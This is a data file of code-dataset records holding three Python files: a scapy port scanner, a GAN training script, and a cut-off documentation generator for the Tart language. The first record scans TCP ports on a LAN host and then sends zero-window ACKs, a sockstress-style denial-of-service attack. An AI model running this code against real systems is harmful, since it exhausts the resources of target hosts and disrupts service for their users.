+{"seq_id":"330674644","text":"from scapy.all import * \r\n#scan TCP ports 1-1023 (you can enter a list of ports instead)\r\nans,unans = sr(IP(dst='192.168.1.1')/TCP(sport=RandShort(), dport=(1,1024)))\r\n#print all the RA responses\r\nfor pkt in ans:\r\n\tif pkt[1][TCP].flags == 'RA':\r\n\t\tprint(\"RA:\",pkt[1].sport)\r\n#print all the SA responses\r\nfor pkt in ans:\r\n\tif pkt[1][TCP].flags == 'SA':\r\n\t\tprint(\"SA:\",pkt[1].sport)\r\n#list of packets\r\nnew=[]\r\n#three way handshake all the open TCP ports\r\nfor pkt in ans:\r\n\tack1=pkt[0]\r\n\tpktans=pkt[1]\r\n\tif pkt[1][TCP].flags == 'SA':\r\n\t\tack1[TCP].seq=pktans.ack\r\n\t\tack1[TCP].ack=pktans.seq +1\r\n\t\tack1[TCP].flags='A'\r\n\t\t#to make it sockstress\r\n\t\tack1.window=0\r\n\t\tnew.append(ack1)\r\nsendp(new)\r\nfor item in new:\r\n\tprint(item.show())","sub_path":"portscan.py","file_name":"portscan.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"645993747","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nimport torch.utils.data\nimport torch.backends.cudnn as cudnn\n\nimport random\nimport argparse\n# from models.models_egan import _netG, _netD1, _netD2, _netD3\nfrom models.models_egan import _netG, _netD1, _netD2, _netD3, _netE\n\n# TODO: \n# 1. array-ify\n# 2. adding context to E's input\n# 3. changing Adam optim for D_i to SGD (try and see if better)\n\n # 0. [reg GAN] Critic/G generates Z \n # 1. [reg GAN] D_i outputs p_i(fake)\n # 2. [reg GAN] D_i gets better in regular GAN (but G does not update)\n # 3. [independent of 1 + 2] given X and context, \n # Actor outputs weights W of length len(D_i) \n # (dist/pdf of action space)\n # 4. multiply p_i * W to get final output o\n # 5. use o to train G: if o is correct, penalize, else encourage = loss_G (==loss_critic)\n # 6. loss_actor = -loss_G\n\nparser = argparse.ArgumentParser(description='train SNDCGAN model')\nparser.add_argument('--cuda', action='store_true', help='enables cuda')\nparser.add_argument('--gpu_ids', default=range(3), help='gpu ids: e.g. 0,1,2, 0,2.')\nparser.add_argument('--manualSeed', type=int, help='manual seed')\nparser.add_argument('--n_dis', type=int, default=1, help='discriminator critic iters')\nparser.add_argument('--nz', type=int, default=128, help='dimention of lantent noise')\nparser.add_argument('--batchsize', type=int, default=64, help='training batch size')\n\nopt = parser.parse_args()\nprint(opt)\n\n# dataset = datasets.ImageFolder(root='/home/chao/zero/datasets/cfp-dataset/Data/Images',\n# transform=transforms.Compose([\n# transforms.Scale(32),\n# transforms.CenterCrop(32),\n# transforms.ToTensor(),\n# transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n# ])\n# )\n\ndataset = datasets.CIFAR10(root='dataset', download=True,\n transform=transforms.Compose([\n transforms.Scale(32),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n]))\n\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batchsize,\n shuffle=True, num_workers=int(2))\n\nif opt.manualSeed is None:\n opt.manualSeed = random.randint(1, 10000)\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\n\nif opt.cuda:\n torch.cuda.manual_seed_all(opt.manualSeed)\n torch.cuda.set_device(opt.gpu_ids[0])\n\ncudnn.benchmark = True\n\ndef weight_filler(m):\n classname = m.__class__.__name__\n if classname.find('Conv' or 'SNConv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\nn_dis = opt.n_dis\nnz = opt.nz\n\nG = _netG(nz, 3, 64)\nSND1 = _netD1(3, 64)\nSND2 = _netD2(3, 64)\nSND3 = _netD3(3, 64)\nE = _netE(3, 64, 0, 3)\nprint(G)\nprint(SND1)\nprint(SND2)\nprint(SND3)\nprint(E)\nG.apply(weight_filler)\nSND1.apply(weight_filler)\nSND2.apply(weight_filler)\nSND3.apply(weight_filler)\nE.apply(weight_filler)\n\ninput = torch.FloatTensor(opt.batchsize, 3, 32, 32)\nnoise = torch.FloatTensor(opt.batchsize, nz, 1, 1)\nfixed_noise = torch.FloatTensor(opt.batchsize, nz, 1, 1).normal_(0, 1)\nlabel = torch.FloatTensor(opt.batchsize)\nreal_label = 1\nfake_label = 0\n\nfixed_noise = Variable(fixed_noise)\ncriterion = nn.BCELoss()\n\nif opt.cuda:\n G.cuda()\n SND1.cuda()\n SND2.cuda()\n SND3.cuda()\n E.cuda()\n criterion.cuda()\n input, label = input.cuda(), label.cuda()\n noise, fixed_noise = noise.cuda(), fixed_noise.cuda()\n\noptimizerG = optim.Adam(G.parameters(), lr=0.0002, betas=(0, 0.9))\noptimizerSND1 = optim.SGD(SND1.parameters(), lr=0.001, momentum=0.8)\noptimizerSND2 = optim.SGD(SND2.parameters(), lr=0.000002, momentum=0.9)\noptimizerSND3 = optim.SGD(SND3.parameters(), lr=0.0002, momentum=0.99)\noptimizerE = optim.Adam(E.parameters(), lr=0.0002, betas=(0, 0.9))\n\nDE_TRAIN_INTERVAL = 1\nfor epoch in range(200):\n # print(\"Epoch\", epoch, \"starting\")\n for i, data in enumerate(dataloader, 0):\n step = epoch * len(dataloader) + i\n \n real_cpu, _ = data\n batch_size = real_cpu.size(0)\n\n input.resize_(real_cpu.size()).copy_(real_cpu)\n label.resize_(batch_size).fill_(real_label)\n inputv = Variable(input)\n labelv = Variable(label)\n ############################\n # (1) Update D_i networks: maximize log(D_i(x)) + log(1 - D_i(G(z)))\n ###########################\n # train with real\n SND1.zero_grad()\n SND2.zero_grad()\n SND3.zero_grad()\n\n if i % DE_TRAIN_INTERVAL == 0:\n output1 = SND1(inputv)\n output2 = SND2(inputv)\n output3 = SND3(inputv)\n\n errD1_real = criterion(output1, labelv)\n errD1_real.backward(retain_graph=True)\n errD2_real = criterion(output2, labelv)\n errD2_real.backward(retain_graph=True)\n errD3_real = criterion(output3, labelv)\n errD3_real.backward(retain_graph=True)\n\n # train with fake\n noise.resize_(batch_size, noise.size(1), noise.size(2), noise.size(3)).normal_(0, 1)\n noisev = Variable(noise)\n fake = G(noisev)\n labelv = Variable(label.fill_(fake_label))\n output1 = SND1(fake.detach())\n output2 = SND2(fake.detach())\n output3 = SND3(fake.detach())\n\n if i % DE_TRAIN_INTERVAL == 0:\n errD1_fake = criterion(output1, labelv)\n errD1_fake.backward(retain_graph=True)\n errD2_fake = criterion(output2, labelv)\n errD2_fake.backward(retain_graph=True)\n errD3_fake = criterion(output3, labelv)\n errD3_fake.backward(retain_graph=True)\n\n errD1 = errD1_real + errD1_fake\n errD2 = errD2_real + errD2_fake\n errD3 = errD3_real + errD3_fake\n \n if i % DE_TRAIN_INTERVAL == 0:\n optimizerSND1.step()\n optimizerSND2.step()\n optimizerSND3.step()\n\n ############################\n # (2) Run E network: given X and context c, output weights W of length len(D_i)\n # (dist/pdf of action space)\n # multiply p_i * W to get final output o\n ###########################\n # print(\"dimensions of concat output: \", torch.stack((output1, output2, output3)).size())\n # print('inputv', inputv.size())\n # output = torch.mm(W, torch.stack((output1, output2, output3)))\n # output = torch.mean(output, 1)\n W = E(inputv) # 64 x 3\n W = torch.sum(W, dim=0) # size 3\n W = torch.div(W, W.sum()) # normalize weights (sum to 1)\n # W = torch.mm(torch.stack((output1, output2, output3)), W) # size (3,1)\n # W = torch.diag(W) # relevant weights * D_i outputs\n \n # Override W for debugging\n # W[0] = 0\n # W[1] = 0\n # W[2] = 1\n # print(\"W override \", W)\n\n output_weight1 = torch.mul(output1, W[0])\n output_weight2 = torch.mul(output2, W[1])\n output_weight3 = torch.mul(output3, W[2])\n stacked = torch.stack((output_weight1, output_weight2, output_weight3))\n E_G_z1 = torch.sum(stacked.mean(dim=1))\n ############################\n # (3) Update G network: maximize log(D(G(z))*E(X,c)) /////formerly: maximize log(D(G(z)))\n # (4) Update E network: minimize log(D(G(z))*E(X,c))\n ###########################\n if step % n_dis == 0:\n G.zero_grad()\n labelv = Variable(label.fill_(real_label)) # fake labels are real for generator cost\n output1 = SND1(fake)\n output2 = SND2(fake)\n output3 = SND3(fake)\n output_weight1 = torch.mul(output1, W[0])\n output_weight2 = torch.mul(output2, W[1])\n output_weight3 = torch.mul(output3, W[2])\n stacked = torch.stack((output_weight1, output_weight2, output_weight3))\n E_G_z2 = torch.sum(stacked.mean(dim=1))\n\n errG1 = torch.mul(criterion(output1, labelv), W[0])\n errG2 = torch.mul(criterion(output2, labelv), W[1])\n errG3 = torch.mul(criterion(output3, labelv), W[2])\n errG = errG1 + errG2 + errG3\n # print(\"errG1 \", errG1)\n # print(\"errG2 \", errG2)\n # print(\"errG3 \", errG3)\n # print(\"Total errG \", errG)\n errG.backward(retain_graph=True)\n\n # DG_E = output.data.mean()\n # DG_E = errG3\n\n optimizerG.step()\n\n # (4) Update E network: minimize log(D(G(z))*E(X,c))\n if i % DE_TRAIN_INTERVAL == 0:\n E.zero_grad()\n errE = -errG\n errE.backward(retain_graph=True)\n optimizerE.step()\n\n if i % 20 == 0:\n print('[%d/%d][%d/%d] Loss_D1: %.4f Loss_D2: %.4f Loss_D3: %.4f Loss_G: %.4f = Loss_log(D(G(z))*E(X,c)) E(G(z)): %.4f / %.4f' % (epoch, 200, i, len(dataloader),\n errD1.data[0], errD2.data[0], errD3.data[0], errG.data[0], E_G_z1, E_G_z2))\n if i % 100 == 0:\n vutils.save_image(real_cpu,\n '%s/real_samples.png' % 'log',\n normalize=True)\n fake = G(fixed_noise)\n vutils.save_image(fake.data,\n '%s/SGD_E_fake_samples_epoch_%03d.png' % ('log', epoch),\n normalize=True)\n\n\n # do checkpointing\ntorch.save(G.state_dict(), '%s/SGD_E_netG_epoch_%d.pth' % ('log', epoch))\ntorch.save(SND1.state_dict(), '%s/SGD_E_netD1_epoch_%d.pth' % ('log', epoch)) \ntorch.save(SND2.state_dict(), '%s/SGD_E_netD2_epoch_%d.pth' % ('log', epoch)) \ntorch.save(SND3.state_dict(), '%s/SGD_E_netD3_epoch_%d.pth' % ('log', epoch)) \ntorch.save(E.state_dict(), '%s/SGD_E_netE_epoch_%d.pth' % ('log', epoch)) \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"train_egan_SGD.py","file_name":"train_egan_SGD.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"444835594","text":"#/bin/python\n\n# TODO: Indexers\n# TODO: Attributes\n# TODO: Name index\n# TODO: Improved InheritDoc\n# TODO: \"Optional\" unions\n# TODO: Better hyperlinking (calculate correct URL from path.)\n# TODO: Type params and method params in urls to disambiguate identical names\n# TODO: Type params in classes\n# TODO: Frames\n# TODO: Deprecated\n# TODO: Search\n# TODO: Accordion Index\n\nimport sys, os\nfrom optparse import OptionParser\nfrom xml.etree import ElementTree\nfrom collections import defaultdict\n\n# Options\nparser = OptionParser()\nparser.add_option(\"-i\", \"--input\", dest=\"infile\",\n help=\"input XML documentation file\", metavar=\"FILE\")\nparser.add_option(\"-o\", \"--output-dir\", dest=\"outdir\",\n help=\"output directory\", metavar=\"DIR\")\nparser.add_option(\"-t\", \"--template-dir\", dest=\"template\",\n help=\"directory for source templates\", metavar=\"DIR\")\nparser.add_option(\"-p\", \"--path\", dest=\"path\", action=\"append\",\n help=\"additional path directories\", metavar=\"DIR\")\nparser.add_option(\"-c\", \"--custom\", dest=\"cust\", action=\"append\",\n help=\"load additional templates for customization\", metavar=\"FILE\")\n\n# Parse options\n(options, args) = parser.parse_args()\n\n# Add the path argument to sys.path\nsys.path.extend(options.path)\nfrom genshi.template import TemplateLoader\nfrom genshi.core import Markup\n\n# Create the template loader\nloader = TemplateLoader(os.path.join(os.path.dirname(__file__), 'templates'))\n\n# The set of tag names representing definitions\nDEFN_TAGS = set([\n \"namespace\",\n \"typedef\",\n \"method\",\n \"macro\",\n \"var\",\n \"let\",\n \"property\",\n \"indexer\",\n \"econst\",\n \"override\",\n \"undef\"])\n\nCALLABLES = set([\n \"method\",\n \"macro\",\n \"override\",\n \"undef\"])\n\nCOMPOSITES = set([\n \"class\",\n \"interface\",\n \"struct\",\n \"protocol\"])\n\nclass Filter(object):\n \"Filter predicates for selecting members of a scope\"\n @staticmethod\n def group_eq(group):\n \"A filter that accepts definitions in a particular group, such as exceptions or attributes\"\n def filter(decl):\n return decl.el.attrib.get('group') == group\n return filter\n \n @staticmethod\n def group_nil(el):\n \"A filter that only accepts definitions with no group attribute\"\n def filter(decl):\n return 'group' not in decl.el.attrib\n return filter\n\n @staticmethod\n def type_eq(*types):\n \"A filter that accepts elements with a given metatype, such as 'class' or 'enun'\"\n types = set(types)\n def filter(decl):\n return decl.el.attrib.get('type') in types\n return filter\n \n @staticmethod\n def is_static():\n \"A filter that accepts only static elements\"\n def filter(decl):\n return decl.el.attrib.get('static') == \"true\"\n return filter\n \n @staticmethod\n def is_not_static():\n \"A filter that accepts only non-static elements\"\n def filter(decl):\n return decl.el.attrib.get('static') != \"true\"\n return filter\n \n @staticmethod\n def accept(el, filters):\n \"Helper method that runs a list of filters against an object and returns True if all succeed\"\n for filter in filters:\n if not filter(el): return False\n return True\n \nclass Declaration(object):\n \"A wrapper around an XML element for a definition\"\n def __init__(self, index, package, qualifiedName, name, el, uri):\n self.index = index\n self.package = package\n self.qualifiedName = qualifiedName\n self.name = name\n self.el = el\n self.tag = el.tag\n self.uri = uri\n self._members = []\n self._typeArgs = el.findall(\"type-arg/*\")\n self._typeParams = el.findall(\"type-param/*\")\n self.path = self.computePath(qualifiedName)\n \n def computePath(self, qualifiedName):\n path = qualifiedName.split('.')\n if self._typeParams:\n path += tuple(typeidlist(self._typeParams))\n if self._typeArgs:\n path += tuple(typeidlist(self._typeArgs))\n return tuple(path)\n\n def __lt__(self, other):\n return self.qualifiedName.__lt__(other.qualifiedName)\n \n def __str__(self):\n return self.qualifiedName\n \n def __repr__(self):\n return self.tag + ':' + self.qualifiedName\n \n def addMember(self, m):\n \"Add a child member to this member's scope\"\n assert m\n self._members.append(m)\n\n def declarator(self):\n \"Returns the declaring keyword of this definition\"\n return self.el.tag\n \n def scopeName(self):\n return self.qualifiedName.rsplit('.', 1)[0]\n\n def visibility(self):\n return self.el.attrib.get('visibility')\n \n def storage(self):\n \"Returns the storage-class of this definition\"\n return 'static' if self.el.attrib.get('static') == 'true' else ''\n \n def members(self, tag=None, *filters):\n result = []\n for member in self._members:\n if member.tag == tag \\\n and Filter.accept(member, filters) \\\n and member.el.attrib.get('visibility') != 'private':\n result.append(member)\n result.sort()\n return result\n\n def inherits(self):\n \"Return the list of all base types\"\n return []\n\n def implements(self):\n \"Return the list of all implemented interfaces\"\n return []\n\n def inheritedBy(self):\n \"Return the list of all sub classes\"\n return []\n\n def implementedBy(self):\n \"Return the list of all implementing classes\"\n return []\n\n def params(self):\n return self.el.findall(\"./doc/parameter\")\n \n def returns(self):\n return self.el.find(\"./doc/returns\")\n \n def throws(self):\n return self.el.findall(\"./doc/exception\")\n\n def summary(self):\n summary = self.el.find(\"./doc/summary\")\n if summary is not None:\n return inner_html(summary)\n\n first_para = self.el.find(\"./doc/description/p\")\n if first_para is not None:\n return inner_html(first_para)\n \n return \"\"\n\n def hasDescription(self):\n return self.el.find(\"./doc/description\")\n \n def description(self):\n desc = self.el.find(\"./doc/description\")\n if desc is not None:\n return inner_html(desc)\n return \"\"\n \n def hasDeprecated(self):\n return self.el.find(\"./doc/deprecated\")\n \n def deprecated(self):\n content = self.el.find(\"./doc/deprecated\")\n if content is not None:\n return inner_html(content)\n return \"\"\n \n def typeArgs(self):\n return self._typeArgs\n\n def typeParams(self):\n return self._typeParams\n\n def formatDeclarator(self):\n mods = []\n if self.visibility() != 'public':\n mods.append(self.visibility())\n if self.el.attrib.get('static') == 'true':\n mods.append('static')\n if self.el.attrib.get('abstract') == 'true':\n mods.append('abstract')\n if self.el.attrib.get('final') == 'true':\n mods.append('final')\n mods.append(self.declarator())\n mods.append(' ')\n return Markup(' ').join(mods)\n \n def formatName(self, makeLink):\n if self.name == \"$call\": return ''\n if makeLink:\n return Markup('').join([\n Markup('' % self.uri),\n self.name,\n Markup('')])\n else:\n return Markup('').join([\n Markup(''),\n self.name,\n Markup('')])\n \n def formatTypeSignature(self):\n return ''\n tag = self.el.tag\n if tag == 'let' or tag == 'var' or tag == 'property':\n return Markup('').join([':', self.index.formatType(self.el.find('type/*'))])\n return ''\n \n def formatDeclaration(self, makeLink):\n return Markup('').join([\n self.formatName(makeLink),\n self.index.formatTypeParamList(self.typeArgs()),\n self.index.formatTypeParamList(self.typeParams()),\n self.formatTypeSignature()])\n \n def compressedText(self, el):\n result = []\n first = True\n for child in el:\n if first and child.tag == \"p\":\n result.append(inner_html(child))\n first = False\n else:\n result.append(outer_html(child))\n return Markup('').join(result)\n \nclass Module(Declaration):\n \"Represents a Tart module.\"\n def __init__(self, index, package, qualifiedName, name, el, uri):\n super(Module, self).__init__(index, package, qualifiedName, name, el, uri)\n\nclass Typedef(Declaration):\n \"Represents a Tart type definition.\"\n def __init__(self, index, package, qualifiedName, name, el, uri):\n super(Typedef, self).__init__(index, package, qualifiedName, name, el, uri)\n\n # Preprocess list of bases\n self._inherits = []\n self._implements = []\n self._inheritedBy = []\n self._implementedBy = []\n kind = el.attrib['type']\n for base in el.findall('./base-type/*'):\n baseKind = typeKind(base)\n if kind == baseKind:\n self._inherits.append(base)\n else:\n self._implements.append(base)\n\n def declarator(self):\n return self.el.attrib['type']\n\n def inherits(self):\n return self._inherits\n\n def implements(self):\n return self._implements\n \n def inheritedBy(self):\n return self._inheritedBy\n\n def implementedBy(self):\n return self._implementedBy\n \nclass Method(Declaration):\n \"Represents a Tart method.\"\n def declarator(self):\n if self.el.tag == 'method': return \"def\"\n return self.el.tag\n\n def formatTypeSignature(self):\n params = []\n for param in self.el.findall('param'):\n psig = Markup('').join(\n [Markup(''), param.attrib['name'], Markup('')])\n param_type = param.find('type/*')\n if param_type is not None:\n psig = Markup(':').join([psig, self.index.formatType(param_type)])\n params.append(psig)\n result = [\n \"(\",\n Markup(\", \").join(params),\n Markup(''),\n \")\"]\n ret = self.el.find('return-type/*')\n if ret is not None:\n result.append(\" -> \")\n result.append(self.index.formatType(ret))\n result.append(Markup(''))\n return Markup('').join(result)\n\nclass Field(Declaration):\n \"Represents a Tart variable or property.\"\n def formatTypeSignature(self):\n return Markup('').join([':', self.index.formatType(self.el.find('type/*'))])\n \nclass Package(object):\n \"Represents a package.\"\n def __init__(self, index, name, url):\n self.index = index\n self.name = name\n self.url = url\n self._modules = []\n self._members = []\n\n def __lt__(self, other):\n return self.name.__lt__(other.name)\n \n def addModule(self, m):\n self._modules.append(m)\n\n def addMember(self, m):\n self._members.append(m)\n\n def modules(self, tag=None, *filters):\n \"Return the members of this package which match the given query criteria\"\n result = []\n for module in self._modules:\n result.extend(module.members(tag, *filters))\n result.sort()\n return result\n \n def members(self, tag=None, *filters):\n \"Return the members of this package which match the given query criteria\"\n result = []\n for member in self._members:\n if (tag == member.tag or (tag is None and member.tag in DEFN_TAGS)) \\\n and Filter.accept(member, filters) \\\n and member.el.attrib.get('visibility') != 'private':\n result.append(member)\n result.sort()\n return result\n \nclass SymbolIndex(object):\n \"Index of all declared symbols\"\n def __init__(self, document):\n self.nameIndex = defaultdict(list)\n self.pathIndex = defaultdict(list)\n self.packageIndex = {}\n self.pages = []\n self.undocPages = defaultdict(lambda: 0)\n self.buildModuleIndex(document.getroot())\n self.buildSubclassIndex()\n\n def makeUri(self, qualifiedName, relativeTo=None):\n # The 'outer' path is the path to the top-level symbol within a module.\n # The 'inner' path is the relative path from the top-level symbol to the declaration.\n outerPath = qualifiedName.split('.')\n innerPath = []\n while outerPath:\n pages = self.pathIndex.get(tuple(outerPath))\n if pages: break\n innerPath.insert(0, outerPath.pop())\n\n # If we never found a package, then no link.\n if not pages:\n return None\n\n # Construct the URL\n result = pages[0].uri\n if innerPath:\n result += '#' + \".\".join(innerPath)\n return result\n\n def makePageUri(self, prefix, path):\n return \"-\".join((prefix,) + path) + \".html\"\n \n def lookup(self, path, basePath=None):\n result = self.pathIndex.get(path)\n# if not result:\n# pass\n return result\n\n def buildModuleIndex(self, rootEl):\n for el in rootEl:\n module = self.module(el)\n \n def buildSubclassIndex(self):\n for mlist in self.pathIndex.values():\n for m in mlist:\n if isinstance(m, Typedef):\n for base in m.inherits():\n baseType = self.findBase(base)\n if baseType:\n baseType._inheritedBy.append(m)\n for base in m.implements():\n baseType = self.findBase(base)\n if baseType:\n baseType._implementedBy.append(m)\n\n def module(self, el):\n path = tuple(el.attrib['name'].split('.'))\n qualifiedName = \".\".join(path)\n packagePath = path[:-1]\n name = path[-1]\n package = self.getOrCreatePackage(packagePath)\n uri = self.makePageUri(\"module\", path)\n module = Module(self, package, qualifiedName, name, el, uri)\n package.addModule(module)\n for childEl in el:\n if childEl.tag in DEFN_TAGS:\n decl = self.declaration(childEl, module, True, None, None)\n module.addMember(decl)\n if decl.name == module.name:\n package.addMember(decl)\n\n def declaration(self, el, parent, topLevel, uriBase, pageDecl):\n name = el.attrib['name']\n uriPrefix = el.attrib['type'] if el.tag == 'typedef' else el.tag\n if topLevel:\n qualifiedName = parent.package.name + '.' + name;\n else:\n qualifiedName = parent.qualifiedName + '.' + name;\n path = tuple(qualifiedName.split('.'))\n \n hasOwnPage = topLevel\n if el.tag == 'typedef' and el.attrib['type'] in COMPOSITES:\n hasOwnPage = True\n\n if hasOwnPage:\n uri = self.makePageUri(uriPrefix, path)\n else:\n uri = uriBase\n if '#' in uri: uri += '-' + name\n else: uri += '#' + name\n\n if el.tag in CALLABLES:\n decl = Method(self, parent.package, qualifiedName, name, el, uri)\n elif el.tag == 'typedef':\n decl = Typedef(self, parent.package, qualifiedName, name, el, uri)\n elif el.tag == 'let' or el.tag == 'var' or el.tag == 'property':\n decl = Field(self, parent.package, qualifiedName, name, el, uri)\n else:\n decl = Declaration(self, parent.package, qualifiedName, name, el, uri)\n parent.addMember(decl)\n self.pathIndex[path].append(decl)\n self.nameIndex[name].append(decl)\n if hasOwnPage:\n pageDecl = decl\n self.pages.append(decl)\n if decl.visibility() != 'private' and el.tag != 'econst' and el.find(\"./doc\") is None:\n self.undocPages[pageDecl] += 1\n for childEl in el:\n if childEl.tag in DEFN_TAGS:\n self.declaration(childEl, decl, False, uri, pageDecl)\n return decl\n\n def getOrCreatePackage(self, path):\n if path not in self.packageIndex:\n name = \".\".join(path)\n uri = 'package-' + \"-\".join(path) + \".html\"\n self.packageIndex[path] = package = Package(self, name, uri)\n return package\n else:\n return self.packageIndex[path]\n \n def packages(self):\n return self.packageIndex.values()\n \n def formatTypeParamList(self, types, *options):\n \"Format 'types' as a list of template arguments. Returns a Markup object\"\n return TypeFormatter(self, options).typeParamList(types)\n\n def formatTypeList(self, types, *options):\n \"Format 'types' as a comma-separated list. Returns a Markup object\"\n return TypeFormatter(self, options).typeList(types)\n\n def formatType(self, ty, *options):\n \"Format 'type' as text. Returns a Markup object\"\n if isinstance(ty, Typedef):\n return TypeFormatter(self, options).a(ty.qualifiedName, ty.uri, 'type-name-link')\n return TypeFormatter(self, options).type(ty)\n\n def findBase(self, el):\n if el.tag == 'typename':\n path = tuple(el.text.split('.'))\n decl = self.lookup(path)\n if decl and len(decl) == 1:\n return decl[0]\n if not decl:\n return None\n else:\n assert False and \"Ambiguous lookup: \" + ElementTree.tostring(el.text)\n elif el.tag == 'template-instance':\n return self.findBase(el.find('typename'))\n else:\n assert False and ElementTree.tostring(el)\n\nclass TypeFormatter(object):\n \"Helper class that formats type expressions as markup objects\"\n def __init__(self, index, options):\n self.index = index\n self.options = set(options)\n\n def typeParamList(self, types):\n if types:\n return Markup('').join(['[', self.typeList(types), ']'])\n return ''\n\n def typeList(self, types):\n return Markup(\", \").join(self.type(ty) for ty in types)\n\n def typeContent(self, el):\n return self.type(list(el)[0])\n\n def type(self, el):\n M = Markup\n if el.tag == 'typename':\n name = el.text\n if name.startswith(\"tart.core.\"): name = name[10:]\n if 'hlink' in self.options and el.attrib['type'] != 'primitive':\n uri = self.index.makeUri(el.text)\n return self.a(name, uri, 'type-name-link')\n else:\n return self.span(name, 'type-name')\n elif el.tag == 'type-variable':\n name = el.attrib['name']\n if 'tsig' in self.options: return self.concat('%', self.span(name, 'type-variable-name'))\n else: return self.span(name, 'type-name')\n elif el.tag == 'array':\n return self.concat(self.typeContent(el), \"[]\")\n elif el.tag == 'variadic':\n return self.concat(self.typeContent(el), \"...\")\n elif el.tag == 'address':\n return self.concat('Address[', self.typeContent(el), ']')\n elif el.tag == 'tuple':\n return self.concat('(', self.typeList(el.findall(\"*\")), ')')\n elif el.tag == 'union':\n return Markup(\" or \").join(self.type(ty) for ty in el.findall(\"*\"))\n elif el.tag == 'template-instance':\n return self.concat(\n self.typeContent(el),\n self.typeParamList(el.findall(\"template-arg/*\")))\n else:\n return self.concat(el.tag, \"??\")\n\n def concat(self, *args):\n return Markup('').join(args)\n \n def a(self, content, href, cls):\n return self.concat(\n Markup('' % (href, cls)), content, Markup(''))\n \n def span(self, content, cls):\n return self.concat(\n Markup('' % cls), content, Markup(''))\n\nclass DocGenerator(object):\n \"The main driver class\"\n def __init__(self, index, custom=[]):\n # Create the template loader\n self.loader = TemplateLoader(os.path.join(os.path.dirname(__file__), 'templates'))\n \n # Symbol index\n self.index = index\n\n # Custom templates \n self.custom = custom\n \n def generate(self):\n self.writePackageIndex()\n self.writePackages()\n self.writeDefinitions()\n self.writeTypes()\n self.writeNamespaces()\n self.writeHierarchy()\n self.writeTODO()\n\n def resetcounter(self):\n self.counter = 0\n \n def evenodd(self):\n self.counter += 1\n return 'row-even' if (self.counter & 1) == 0 else ''\n \n def writeTemplate(self, template, outputfile, **kwargs):\n if not os.path.exists(options.outdir):\n os.makedirs(options.outdir)\n outfile = os.path.join(options.outdir, outputfile)\n # print \"Generating:\", outfile\n template = loader.load(template)\n stream = template.generate(gen=self, si=self.index, **kwargs)\n content = stream.render('html', doctype='html5', encoding=\"UTF-8\", strip_whitespace=True)\n fh = open(outfile, \"w\")\n fh.write(content)\n fh.close()\n\n def writePackageIndex(self):\n self.writeTemplate(\"index.xml\", \"index.html\", data=self.index.packages())\n \n def writePackages(self):\n for pkg in self.index.packages():\n self.writeTemplate(\"package.xml\", pkg.url, pkg=pkg, filter=Filter)\n\n def writeDefinitions(self):\n for defn in self.index.pages:\n self.writeTemplate(\"defn.xml\", defn.uri, d=defn, filter=Filter)\n\n def writeTypes(self):\n decls = []\n for package in self.index.packages():\n for defn in package.members(\"typedef\"):\n decls.append(defn)\n for inner in defn.members(\"typedef\"):\n decls.append(inner)\n \n decls.sort() \n self.writeTemplate(\"types.xml\", \"types.html\", data=decls)\n \n def writeHierarchy(self):\n classes = []\n for package in self.index.packages():\n for cls in package.members(\"typedef\"):\n if cls.tag == 'typedef':\n type = cls.el.attrib['type']\n if type == 'class':\n if not cls.inherits() and cls.visibility() != 'private':\n classes.append(cls)\n self.writeTemplate(\"hierarchy.xml\", \"hierarchy.html\", data=classes)\n\n def writeNamespaces(self):\n decls = []\n for package in self.index.packages():\n for defn in package.members(\"namespace\"):\n decls.append(defn)\n for inner in defn.members(\"namespace\"):\n decls.append(inner)\n \n decls.sort() \n self.writeTemplate(\"namespaces.xml\", \"namespaces.html\", data=decls)\n \n def writeTODO(self):\n items = sorted(self.index.undocPages.items(), key=lambda x:-x[1])\n self.writeTemplate(\"todo.xml\", \"todo.html\", undoc=items)\n\n# Strip the namespace off of all XML elements. This makes them much easier to work with.\ndef strip_xml_namespace(el):\n _, el.tag = el.tag.split('}')\n for child in el:\n strip_xml_namespace(child)\n\n# Return the 'outerHTML' of an element, with appropriate escaping. \ndef outer_html(el):\n result = []\n flatten(el, result)\n return Markup('').join(result)\n\n# Return the 'innerHTML' of an element, with appropriate escaping. \ndef inner_html(el):\n result = []\n flatten_children(el, result)\n return Markup('').join(result)\n\ndef flatten_children(el, result):\n if el.text: result.append(el.text)\n for child in el:\n flatten(child, result)\n if child.tail: result.append(child.tail)\n \ndef flatten(el, result):\n attrs = ''\n for key in el.attrib:\n attrs += ' %s=\"%s\"' % (key, el.attrib[key])\n result.append(Markup(\"<%s%s>\" % (el.tag, attrs)))\n flatten_children(el, result)\n result.append(Markup(\"%s>\" % el.tag))\n \ndef typeKind(el):\n if el.tag == 'typename':\n return el.attrib.get('type')\n elif el.tag == 'template-instance':\n return typeKind(el.find('typename'))\n else:\n return None\n\ndef typeid(el):\n tag = el.tag\n if tag == 'typename': return el.text\n elif el.tag == 'type-variable': return '%' + el.attrib['name']\n elif el.tag == 'array': return contentid(el) + '[]'\n elif el.tag == 'variadic': return contentid(el) + '...'\n elif el.tag == 'address': return 'Address[%s]' % contentid(el)\n elif el.tag == 'tuple': return '(%s)' % \",\".join(typeidlist(el.findall('*')))\n elif el.tag == 'union': return \" or \".join(typeidlist(el.findall('*')))\n elif el.tag == 'template-instance':\n return contentid(el) + '[%s]' % \",\".join(typeidlist(el.findall('template-arg/*')))\n else:\n assert False and ElementTree.tostring(el)\n\ndef typeidlist(els):\n return [typeid(el) for el in els]\n\ndef contentid(el):\n return typeid(list(el)[0])\n \n# Load the input XML 